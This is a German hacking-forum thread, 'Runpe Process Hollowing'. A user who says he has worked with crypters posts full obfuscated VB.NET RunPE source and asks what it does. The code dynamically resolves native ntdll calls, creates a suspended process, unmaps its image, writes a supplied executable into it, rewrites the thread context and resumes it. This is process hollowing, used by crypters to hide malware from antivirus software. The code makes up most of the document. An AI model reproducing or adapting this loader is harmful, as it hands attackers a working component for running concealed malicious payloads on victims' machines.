Habe gerade ne Antwort
---------- Post added at 17:50 ---------- Previous post was at 17:45 ----------
Bisher haber ich Nur Crypterfahrungen gemacht in VB
Hier ist ein Code mit dem ich mich beschäftige.
der funktioniert bei mir nur ist er Veraltert
würde gern kapier was z.B das hier bedeutet
Code:Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr "Imports System.Runtime.InteropServices Imports System.Text '''' <summary> '''' Coder : Rahoz '''' RunPE Coder : Simon-Binyo '''' Call : ( byte() , String ) '''' Purpose : Execute App In Memory from byte array '''' </summary> Public Class gFDLGDFASKL Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T) End Function Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr, ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr, ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer) As IntPtr Delegate Function lkgzcI(ByVal CCPhess As IntPtr, ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As UInteger, ByVal awiftTtgC As Integer) As Boolean Public Declare Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer Dim qZYGUEz As IntPtr Dim WBiwMxI As Integer Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory") Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI) Return qZYGUEz End Function Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean Try Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned) : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject : Wakodbh.Free() Dim EEXsqPyEy As IntPtr = IntPtr.Zero Dim yYEifvEzt As IntPtr() = New IntPtr(3) {} Dim PXYyxEHcm As Byte() = New Byte(67) {} Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60) Dim BmSklSftl As Integer Dim EFfDmpqlB As UInteger() = New UInteger(178) {} EFfDmpqlB(0) = &H10002 Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy, False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt) Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C)) BmSklSftl = CeCyARJ(gnzWsnHkF + &H34) Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection") qfXWO(yYEifvEzt(0), BmSklSftl) Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx") Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40) Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34)) Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80)) Dim bdLBZrKmW As Integer Dim rszaetz As Integer Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory") api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW) For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1 Dim QcXOrDrbL As Integer() = New Integer(9) {} Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40) Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {} Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length) MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3)) AEhEKTVFO = New IntPtr(ljsdhhds.Length) api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz) Next i Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread") sdfsgt(yYEifvEzt(1), EFfDmpqlB) api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz) EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28) Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread") ihsg(yYEifvEzt(1), EFfDmpqlB) Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread") ByZcV(yYEifvEzt(1), 0) Catch ex As Exception Return False"
Ergebnis 1 bis 7 von 7
Thema: Runpe Process Hollowing
Baum-Darstellung
-
26.01.2018, 15:50 #4Anfänger
- Registriert seit
- 14.01.2018
- Beiträge
- 6
AW: Runpe Process Hollowing
Geändert von Barny (29.01.2018 um 16:07 Uhr)
ZitierenÄhnliche Themen
-
Unique RunPE
Von Anatoxis im Forum TrashboxAntworten: 2Letzter Beitrag: 30.05.2010, 23:10 -
[VB.NET Source] - RunPE
Von Sawyer im Forum TrashboxAntworten: 0Letzter Beitrag: 18.09.2009, 13:38 -
VB.NET - RunPE
Von Sawyer im Forum .NET Sprachen - TechnikenAntworten: 12Letzter Beitrag: 22.02.2009, 18:50 -
[VB.NET] RunPE Problem
Von hackerking im Forum .NET Sprachen - TechnikenAntworten: 1Letzter Beitrag: 21.12.2008, 00:29
